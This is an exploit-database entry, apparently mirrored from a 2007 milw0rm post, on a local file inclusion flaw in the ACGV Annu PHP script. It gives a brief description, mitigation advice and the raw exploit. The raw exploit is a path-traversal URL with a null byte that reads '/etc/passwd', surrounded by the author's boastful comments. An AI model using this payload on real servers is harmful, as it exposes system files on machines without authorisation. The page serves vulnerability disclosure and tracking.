header-logo
Suggest Exploit
vendor:
by:
BeyazKurt
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ACGV Annu (rubrik) Local File Inclusion Exploit

This exploit allows an attacker to include files from the server's file system by manipulating the 'rubrik' parameter in the URL. By using '../' to navigate to directories above the web root, the attacker can access sensitive files such as '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate any file paths used in the application. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

# BeyazKurt - B3yazKurt@Hotmail.Com
#
# ACGV Annu (rubrik) Local File Inclusion Exploit
#
# Lamerler ortada kol geziyo aman dikkat ! Tr0jan kazasına denk gelmeyin !!
#
# Www.HackSafety.Com // Hackingde yeni bir çağ ...
#
# HackSafety.Com & WorldHackerz.Net KardeÅŸliÄŸi...
#
# rerere rararara bjk bjk MUAHAHAH
#
# Fincanı taştan oyarlar amanın oyarlar beşiktaşa böyle ... bjk'e böyle ... !!
#
# Download : http://www.phpscripts-fr.net/scripts/download.php?id=1107

/theme/acgv.php?rubrik=../../../etc/passwd%00

# milw0rm.com [2007-05-07]

Navigation

Suggest Exploit

Services By CQR